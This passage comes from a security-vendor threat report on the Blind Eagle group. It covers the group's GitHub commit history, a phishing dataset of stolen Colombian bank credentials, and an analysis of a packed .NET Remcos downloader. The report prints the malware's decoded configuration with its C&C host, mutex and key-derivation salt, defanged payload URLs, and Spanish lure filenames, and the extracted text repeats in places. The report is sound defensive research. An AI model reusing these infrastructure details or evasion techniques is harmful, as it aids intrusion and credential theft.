author\r\nOscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740492093 -0500 committer GitHub\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 10 of 17\n\n\u003cnoreply@github.com\u003e 1740492093 -0500 Add files via upload * Ver Datos del Formulario.html -\r\ne0837aebd649dba01bc4d594ef21a8086edaaeeb ==================================================\r\n[2025-02-25T15:27:01Z] Author: Oscarito20222 tree 63a5c5307b93e0393aba14b42d7915ab7a2733ef parent\r\n12eacb556eee889a16beb2fe9449748ebb4e33b0 author Oscarito20222\r\n\u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740497221 -0500 committer GitHub \u003cnoreply@github.com\u003e\r\n1740497221 -0500 Delete Ver Datos del Formulario.html\r\n==================================================\r\n[2025-02-25T14:01:33Z] Author: Oscarito20222\r\ntree f03354f986a1398d1b471c0af75b404474cf94f7\r\nparent 9653938c6fd4b347209d87923f3617d70a3c12e2\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740492093 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740492093 -0500\r\nAdd files via upload\r\n * Ver Datos del Formulario.html - e0837aebd649dba01bc4d594ef21a8086edaaeeb\r\n==================================================\r\n[2025-02-25T15:27:01Z] Author: Oscarito20222\r\ntree 63a5c5307b93e0393aba14b42d7915ab7a2733ef\r\nparent 12eacb556eee889a16beb2fe9449748ebb4e33b0\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740497221 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740497221 -0500\r\nDelete Ver Datos del Formulario.html\r\nFor approximately 1 hour and 27 minutes, the group uploaded an HTML file named Ver Datos del Formulario.html ,\r\nwhich was later deleted. As of now, this remains the last recorded action in the repository, which occurred on February 25,\r\n2025, at 15:27 UTC.\r\nFigure 11 – Last commits for the repository Oscarito20222/file .\r\nAt this point, Blind Eagle resumed its activity, using the repository Oscarito20222/diciembre , with the first commit\r\ntaking place at 17:39 UTC the same day:\r\n==================================================\r\n[2022-12-21T17:31:25Z] Author: Oscarito20222\r\ntree 67eb4f5d839ca89b28203a27ce3ca74029b93b7c\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1671643885 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1671643885 -0500\r\n* 2112-2.7z - 4e3cb251fb98a47c2f5dec5f3722723990c17a49\r\n==================================================\r\n[2025-02-25T17:39:17Z] Author: Oscarito20222\r\ntree 1b6fc5c2150d598472f892a88305545626d977bd\r\nparent de2b332d06251e6449760ceead598a56da637daa\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740505157 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740505157 -0500\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 11 of 17\n\n* sena.exe - abf71fd332b760da29aa211f4aaa1661860a98c6\r\n==================================================\r\n[2025-02-25T17:39:29Z] Author: Oscarito20222\r\ntree 3262538dbe881b34cfd71cedcb27e03688573f0e\r\nparent 408d7ef19b151668e2445532e06c6b3a569ebf98\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740505169 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740505169 -0500\r\n==================================================\r\n[2025-02-26T15:07:11Z] Author: Oscarito20222\r\ntree d119d827561c0796c50deb8cf69f324811479e88\r\nparent d645bd6c880358d2bb4dfd83252ebbb6156c6b5c\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740582431 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740582431 -0500\r\n* TobaccoAnnouncement.exe - 44182ce5a8fadef41064d7c0266e8f99015262b0\r\n================================================== [2022-12-21T17:31:25Z] Author: Oscarito20222 tree\r\n67eb4f5d839ca89b28203a27ce3ca74029b93b7c author Oscarito20222\r\n\u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1671643885 -0500 committer GitHub \u003cnoreply@github.com\u003e\r\n1671643885 -0500 Add files via upload * 2112-2.7z - 4e3cb251fb98a47c2f5dec5f3722723990c17a49\r\n================================================== [2025-02-25T17:39:17Z] Author: Oscarito20222 tree\r\n1b6fc5c2150d598472f892a88305545626d977bd parent de2b332d06251e6449760ceead598a56da637daa author\r\nOscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740505157 -0500 committer GitHub\r\n\u003cnoreply@github.com\u003e 1740505157 -0500 Add files via upload * sena.exe - abf71fd332b760da29aa211f4aaa1661860a98c6\r\n================================================== [2025-02-25T17:39:29Z] Author: Oscarito20222 tree\r\n3262538dbe881b34cfd71cedcb27e03688573f0e parent 408d7ef19b151668e2445532e06c6b3a569ebf98 author\r\nOscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740505169 -0500 committer GitHub\r\n\u003cnoreply@github.com\u003e 1740505169 -0500 Delete 2112-2.7z\r\n================================================== [2025-02-26T15:07:11Z] Author: Oscarito20222 tree\r\nd119d827561c0796c50deb8cf69f324811479e88 parent d645bd6c880358d2bb4dfd83252ebbb6156c6b5c author\r\nOscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740582431 -0500 committer GitHub\r\n\u003cnoreply@github.com\u003e 1740582431 -0500 Add files via upload * TobaccoAnnouncement.exe -\r\n44182ce5a8fadef41064d7c0266e8f99015262b0\r\n==================================================\r\n[2022-12-21T17:31:25Z] Author: Oscarito20222\r\ntree 67eb4f5d839ca89b28203a27ce3ca74029b93b7c\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1671643885 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1671643885 -0500\r\nAdd files via upload\r\n * 2112-2.7z - 4e3cb251fb98a47c2f5dec5f3722723990c17a49\r\n==================================================\r\n[2025-02-25T17:39:17Z] Author: Oscarito20222\r\ntree 1b6fc5c2150d598472f892a88305545626d977bd\r\nparent de2b332d06251e6449760ceead598a56da637daa\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740505157 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740505157 -0500\r\nAdd files via upload\r\n * sena.exe - abf71fd332b760da29aa211f4aaa1661860a98c6\r\n==================================================\r\n[2025-02-25T17:39:29Z] Author: Oscarito20222\r\ntree 3262538dbe881b34cfd71cedcb27e03688573f0e\r\nparent 408d7ef19b151668e2445532e06c6b3a569ebf98\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740505169 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740505169 -0500\r\nDelete 2112-2.7z\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 12 of 17\n\n==================================================\r\n[2025-02-26T15:07:11Z] Author: Oscarito20222\r\ntree d119d827561c0796c50deb8cf69f324811479e88\r\nparent d645bd6c880358d2bb4dfd83252ebbb6156c6b5c\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740582431 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740582431 -0500\r\nAdd files via upload\r\n * TobaccoAnnouncement.exe - 44182ce5a8fadef41064d7c0266e8f99015262b0\r\nOpfail Timeline:\r\n2025-02-25 14:01 UTC, Blind Eagle uploads to Oscarito20222/file HTML PII data from phishing activities.\r\n2025-02-25 15:27 UTC, Deletes HTML file containing PII.\r\n2025-02-25 17:39 UTC, Uploads Remcos RAT with C\u0026C 21ene.ip-ddns[.]com to Oscarito20222/diciembre\r\nrepository\r\n2025-02-25 17:39 UTC, Deletes archive from Oscarito20222/diciembre that was uploaded approximately two\r\nyears ago.\r\nCheck Point Research obtained this HTML file, which was linked to phishing activities from early March 2024. The\r\nphishing domain servicioseguroenlineabb[.]com appears to have impersonated Colombian Banks.\r\nThe PII data contains four fields:\r\n1. Nombre de Usuario, Username\r\n2. Contraseña Usuario, User Password\r\n3. Correo electrónico, Email\r\n4. Contraseña del correo, Email Password\r\n5. Clave Cajero, ATM PIN\r\nThe dataset (Referred to as: “Datos del Formulario”) contained over 8,400 entries, with 8,075 valid after filtering out\r\nempty or insufficient records. These valid entries included account-password pairs (username or email or all data filled),\r\nwith 1,634 email addresses identified.\r\nThe phishing campaign specifically targeted Colombian users. Among the collected email addresses:\r\nThe majority were personal accounts (Gmail, Yahoo, Hotmail, etc.).\r\nFive belonged to the Colombian government.\r\ncorreo.policia.gov.co\r\nsic.gov.co\r\ncontraloria.gov.co\r\nadr.gov.co\r\ndian.gov.co\r\nFourteen were associated with educational institutions.\r\nThe remaining addresses belonged to businesses operating in Colombia.\r\n.NET RAT – “Remcos Downloader”\r\nThe .NET RAT delivered during the malware campaigns is protected with HeartCrypt, a Packer-as-a-Service (PaaS) that\r\nemerged in early 2024 to obfuscate malware and evade detection by security software. This packer embeds malicious code\r\ninto otherwise legitimate binaries, with the packed payload stored as a resource. When executed, HeartCrypt first unpacks a\r\nsimple .NET packer, which is injected into and triggered within csc.exe .\r\nThis .NET packer contains an embedded buffer that is:\r\n1. Decrypted using AES\r\n2. Decompressed with GZIP\r\n3. Loaded into memory as a .NET RAT assembly\r\nIn addition, the final executable (.NET RAT assembly) is obfuscated with NET-Reactor, applying both string encryption\r\nand control flow obfuscation to further hinder analysis.\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 13 of 17\n\nFigure 12 – .NET Packer, Unpacking process.\r\nThe majority of the strings are encrypted and stored inside a resource, which is immediately decrypted when execution\r\nbegins. Then, each time a specific string is required, the malware requests it based on the index ID, where the index points to\r\nthe DWORD size of the string followed by the string content. The decrypted variable (containing the decrypted strings\r\nresource) follows the structure of how strings are stored in the #US stream in .NET binaries. NETReactorSlayer (a well-known open-source deobfuscator for NET-Reactor-protected binaries) is able to decrypt those strings and deobfuscate such\r\nbinaries.\r\nFigure 13 – Function that retrieves String based on index ID.\r\nThe decrypted resource contains a base64 string, which is deserialized and contains the malware configuration along with\r\nthe C\u0026C.\r\nCmIKIXJlcHVibGljYWRvbWluaWNhMjAyNS5pcC1kZG5zLmNvbRD56wEYBSIIbW9ubzEyMzQyCnNvY2lhbGlzbW9CElNwb25zb3JzaGlwVGltZW\r\n\"1\": \"republicadominica2025[.]ip-ddns[.]com\",\r\n\"8\": \"SponsorshipTimeout\",\r\nCmIKIXJlcHVibGljYWRvbWluaWNhMjAyNS5pcC1kZG5zLmNvbRD56wEYBSIIbW9ubzEyMzQyCnNvY2lhbGlzbW9CElNwb25zb3JzaGlwVGltZW\r\n{ \"1\": { \"1\": \"republicadominica2025[.]ip-ddns[.]com\", \"2\": 30201, \"3\": 5, \"4\": \"mono1234\", \"6\": \"socialismo\", \"8\":\r\n\"SponsorshipTimeout\", \"12\": \"NextActivator\" } }\r\nCmIKIXJlcHVibGljYWRvbWluaWNhMjAyNS5pcC1kZG5zLmNvbRD56wEYBSIIbW9ubzEyMzQyCnNvY2lhbGlzbW9CElNwb25zb3JzaGlwVGltZW\r\n{\r\n \"1\": {\r\n \"1\": \"republicadominica2025[.]ip-ddns[.]com\",\r\n \"2\": 30201,\r\n \"3\": 5,\r\n \"4\": \"mono1234\",\r\n \"6\": \"socialismo\",\r\n \"8\": \"SponsorshipTimeout\",\r\n \"12\": \"NextActivator\"\r\n }\r\n}\r\nThe malware collects information regarding the execution, machine, and user, then serializes them using protobuf and\r\nencrypts them using AES. Data sent to the C\u0026C:\r\nBot ID\r\nCampaign ID socialismo\r\nUsername\r\nOS Version\r\nMalware version 0.3.9\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 14 of 17\n\nAntivirus installed\r\nProcess Architecture\r\nProcess name\r\nMachine specs …\r\nThe malware attempts to retrieve IP addresses from the C\u0026C domain name ( GetHostAddresses ) and, if successful, sends\r\nthe collected information.\r\nFigure 14 – GetHostAddresses with C\u0026C.\r\nData is serialized, and machine information is sent along with the malware campaign socialismo and version 0.3.9 .\r\nFigure 15 – Data Serialization.\r\nThe AES key used to encrypt and decrypt network communications is derived by calling Rfc2898DeriveBytes using as a\r\npassword the mutex name mono1234 and salt { 1, 2, 23, 234, 37, 48, 134, 63, 248, 4 } .\r\nFigure 16 – AES Key generation.\r\nA similar process then retrieves the response from the C\u0026C server, which responds with a buffer containing the DWORD\r\nsize followed by the AES encrypted buffer. At this moment, Blind Eagle has utilized this RAT as a downloader, receiving a\r\nURL with the file being downloaded and injected either into MSBuild.exe or InstallUtil.exe .\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 15 of 17\n\nFigure 17 – Random choice of process to be injected.\r\nEven though Blind Eagle uses this command the most, utilizing this .NET RAT as a simple downloader, the malware also\r\ncontains other functionalities, such as downloading the next payload on disk, maintaining persistence via scheduled tasks, or\r\neven executing PowerShell scripts.\r\nFigure 18 – Powershell file execution.\r\nConclusion\r\nBlind Eagle remains one of the most active and dangerous threat actors in Latin America, with a particular focus on\r\nColombia’s public and private sectors. The group’s scale and persistence are evident, with over 1,600 infections recorded\r\nfrom a single campaign. Long suspected of originating in Latin America, the confirmation of its UTC-5 operating timezone\r\nfurther narrows its likely base of operations to several South American countries.\r\nDespite Microsoft’s release of a patch for CVE-2024-43451 on November 12, 2024, Blind Eagle quickly adapted,\r\nintroducing a variant of the “exploit” in just six days. This rapid response highlights the group’s technical expertise,\r\nadaptability, and relentless pursuit of new attack methods. By incorporating malicious .url files into its arsenal, Blind\r\nEagle continues to refine its tactics, ensuring its malware distribution remains effective against evolving security defenses.\r\nA key factor in its success is its ability to exploit legitimate file-sharing platforms, including Google Drive, Dropbox,\r\nBitbucket, and GitHub, allowing it to bypass traditional security measures and distribute malware stealthily. Additionally,\r\nits use of underground crimeware tools such as Remcos RAT, HeartCrypt, and PureCrypter reinforces its deep ties to the\r\ncybercriminal ecosystem, granting access to sophisticated evasion techniques and persistent access methods.\r\nBlind Eagle’s rapid evolution, effective social engineering tactics, and focus on both public and private sector entities make\r\nit a critical cybersecurity threat. Mitigating its impact requires proactive threat intelligence, advanced security defenses, and\r\ncontinuous monitoring. Organizations must remain vigilant against phishing campaigns, file-based malware delivery, and\r\nunconventional attack techniques to stay ahead of this ever-adapting adversary.\r\nProtections\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 16 of 17\n\nCheck Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file types, and\r\noperating systems and protect against the attacks and threats described in this report.\r\nExploit.Wins.CVE-2024-43451.ta.A\r\nInfostealer.Win.Generic.F\r\nInjector.Win.RunPE.A\r\nInfostealer.Win.PasswordStealer.A\r\nTrojan.Win.Unpacme.gl.I\r\nExploit.Win.UnDefender.A\r\nPacker.Win.VBNetCrypter.H\r\nPacker.Win.VBNetCrypter.E\r\nPacker.Win.DotNetCrypter.G\r\nTrojan.Win.Benjaminbo_test.gl.A\r\nbehavioral.win.suspautorun.a\r\nbehavioral.win.imagemodification.g\r\nIndicators of Compromise\r\nDescription Value\r\nStage 1 – ITW\r\nEndpoints\r\ndrive.usercontent[.]google[.]com/download?id=1CZcgN1kxz9kSNgscR9qgiOAERo-w-rTa\u0026export=download\r\ndrive.usercontent[.]google[.]com/download?id=1PZ2Ndi-GT-oQHlobFIdDJoSDSXkJvECV\u0026export=download\r\ndrive.usercontent[.]google[.]com/download?id=1R9MR64hy-dQelTZMPtsrSXLWObFt7mf2\u0026export=download\r\nStage 1 – .url\r\n1d1e007a9d8939bee7a0333522cc4f7480d448cc\r\n133bc4304057317b0b93f5ff44f20d153b985b50\r\n1fcc44d3b20381acce66f5634743917e8f22dae7\r\na0338654304b6f824bdc39bbb482a0e114f8a3a1\r\nStage 2 – ITW\r\nEndpoints\r\n62.60.226[.]64/file/1374_2790.exe\r\n62.60.226[.]64/file/3819_5987.exe\r\n62.60.226[.]64/file/4025_3980.exe\r\n62.60.226[.]64/file/9451_1380.exe\r\nStage 2 –\r\nPayloads\r\n07647f0eddf46d19e0864624b22236b2cdf561a1\r\n08daf84d9c2e9c51f64e076e7611601c29f68e90\r\n83c851f265f6d7dc9436890009822f0c2d4ba50a\r\n33ddaedc98991435f740f7a5a8a931a8cadd5391\r\nState 2 – C\u0026C republicadominica2025[.]ip-ddns[.]com\r\nStage 3 – ITW\r\nEndpoint\r\nraw.githubusercontent[.]com/Oscarito20222/file/refs/heads/main/redtube.exe\r\nStage 3 –\r\nRemcos\r\n758c73ab9706ae6977f9b4601c20b3667836d3ef\r\nStage 3 –\r\nRemcos C\u0026C\r\nelyeso.ip-ddns[.]com:30204\r\nSource: https://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 17 of 17\n\n[Filename] - en virtud [English] - \"By virtue del artículo 220 de of Article 220 of Colombian la Ley colombiana/Juzgados Law / Courts of Execution de Ejecución De Penas y of Sentences and Medidas De Seguridad.url Security Measures.\"\n[Filename]-COMUNICADO N° 00239948 PROFERIDO PENAL 00028483 28 DE NOVIEMBRE/OFICIO N° 00239948\nPROFERIDO PENAL 00028483 28 DE NOVIEMBRE.url \n[English]-\"Communication No. 00239948 issued Criminal 00028483 November 28 / Official Letter No. 00239948 issued\nCriminal 00028483 November 28.\" \n[Filename]-Oficio Tutelar 0439594-Proceso N° 03948939-002024.url \n[English]-\"Protective Order 0439594- Case No. 03948939-002024.\" \n[Filename]-Juzgados de ejecución de sentencias de bogotá con función de conocimiento programó diligencia de\nCONTINUACIÓN JUICIO ORAL REFERENCIA.url [English] -\"Courts of sentence execution in Bogotá with knowledge\nfunction scheduled a hearing for the continuation of the oral trial in reference.\" [Filename] \nNOTIFICACIÓN_AUDIENCIA_TOMA_DE_MUESTRA_QUE_INVOLUCREN_IMPUTADO.url [English]-\n\"Notification of hearing for the taking of samples involving the defendant.\" [Filename]- \nQUERELLA_JUDICIAL_No7254178000020150023000_Juzgado 9 Municipal de Pequeñas Causas Laborales de\nBogotá.url [English] -\"Judicial Complaint No. 7254178000020150023000, 9th Municipal Court of Small Labor Causes of\nBogotá.\" [Filename] -este despacho le informa que deberá comparecer ante el Juzgado Penal (6to) del Circuito de Bogot.url\n[English]-\"This office informs you that you must appear before the 6th Criminal Court of the Circuit of Bogotá.\"\n[Filename]-en virtud del artículo 220 de la Ley colombiana/Juzgados de Ejecución De Penas y Medidas De Seguridad.url\n[English]-\"By virtue of Article 220 of Colombian Law / Courts of Execution of Sentences and Security Measures.\"\n[Filename]-COMUNICADO N° 00239948 PROFERIDO PENAL 00028483 28 DE NOVIEMBRE/OFICIO N° 00239948\nPROFERIDO PENAL 00028483 28 DE NOVIEMBRE.url [English]- \"Communication No. 00239948 issued Criminal\n00028483 November 28 / Official Letter No. 00239948 issued Criminal 00028483 November 28.\" [Filename]-Oficio\nTutelar 0439594-Proceso N° 03948939-002024.url [English] -\"Protective Order 0439594-Case No. 03948939-002024.\"\n[Filename]-Juzgados de ejecución de sentencias de bogotá con función de conocimiento programó diligencia de\n[English]-\"Courts of sentence execution in Bogotá with knowledge function scheduled a hearing for the contin\n[Filename] NOTIFICACIÓN_AUDIENCIA_TOMA_DE_MUESTRA_QUE_INVOLUCREN_IMPUTADO.url \n[English]-\"Notification of hearing for the taking of samples involving the defendant.\" \n[Filename]-QUERELLA_JUDICIAL_No7254178000020150023000_Juzgado 9 Municipal de Pequeñas Causas Laborales de Bo\n[English]-\"Judicial Complaint No. 7254178000020150023000, 9th Municipal Court of Small Labor Causes of Bogot\n[Filename]-este despacho le informa que deberá comparecer ante el Juzgado Penal (6to) del Circuito de Bogot\n[English]-\"This office informs you that you must appear before the 6th Criminal Court of the Circuit of Bogo\n[Filename]-en virtud del artículo 220 de la Ley colombiana/Juzgados de Ejecución De Penas y Medidas De Segur\n[English]-\"By virtue of Article 220 of Colombian Law / Courts of Execution of Sentences and Security Measure\n[Filename]-COMUNICADO N° 00239948 PROFERIDO PENAL 00028483 28 DE NOVIEMBRE/OFICIO N° 00239948 PROFERIDO PENA\n[English]-\"Communication No. 00239948 issued Criminal 00028483 November 28 / Official Letter No. 00239948 is\n[Filename]-Oficio Tutelar 0439594 -Proceso N° 03948939-002024.url \n[English]-\"Protective Order 0439594 -Case No. 03948939-002024.\" \nWhile operating with the specific malicious file for over two months, the APT group has changed approximately more than\nten different C\u0026Cs (Command and Control Servers) for its final stage payload. The attack chain has some small variations,\nbut the .url files are always part of the campaign during the initial stage. \nCampaigns ‘socialismo’ \u0026 ‘miami’- January 21-22, 2025 \nDuring the campaigns that took place around January 21 and 22, 2025, the APT group distributed multiple .url files via\nemail through possibly compromised Google Drive accounts. \n Page 4 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/" ], "report_names": [ "blind-eagle-and-justice-for-all" ], "threat_actors": [ { "id": "98b22fd7-bf1b-41a6-b51c-0e33a0ffd813", "created_at": "2022-10-25T15:50:23.688973Z", "updated_at": "2026-04-10T02:00:05.390055Z", "deleted_at": null, "main_name": "APT-C-36", "aliases": [ "APT-C-36", "Blind Eagle" ], "source_name": "MITRE:APT-C-36", "tools": [ "Imminent Monitor" ], "source_id": "MITRE", "reports": null }, { "id": "be597b07-0cde-47bc-80c3-790a8df34af4", "created_at": "2022-10-25T16:07:23.407484Z", "updated_at": "2026-04-10T02:00:04.58656Z", "deleted_at": null, "main_name": "Blind Eagle", "aliases": [ "APT-C-36", "APT-Q-98", "AguilaCiega", "G0099" ], "source_name": "ETDA:Blind Eagle", "tools": [ "AsyncRAT", "BitRAT", "Bladabindi", "BlotchyQuasar", "Imminent Monitor", "Imminent Monitor RAT", "Jorik", "LimeRAT", "Remcos", "RemcosRAT", "Remvio", "Socmer", "Warzone", "Warzone RAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "dbcd2cc1-1adb-43cf-b175-a3ef4ee0d15e", "created_at": "2024-11-16T02:00:03.808384Z", "updated_at": "2026-04-10T02:00:03.767693Z", "deleted_at": null, "main_name": "UAC-0194", "aliases": [], "source_name": "MISPGALAXY:UAC-0194", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bd43391b-b835-4cb3-839a-d830aa1a3410", "created_at": "2023-01-06T13:46:38.925525Z", "updated_at": "2026-04-10T02:00:03.147197Z", "deleted_at": null, "main_name": "APT-C-36", "aliases": [ "Blind Eagle" ], "source_name": "MISPGALAXY:APT-C-36", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434806, "ts_updated_at": 1775826746, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6443e6d70d7f834d28ebd54745fadb7ba6a297b8.pdf", "text": "https://archive.orkl.eu/6443e6d70d7f834d28ebd54745fadb7ba6a297b8.txt", "img": "https://archive.orkl.eu/6443e6d70d7f834d28ebd54745fadb7ba6a297b8.jpg" } }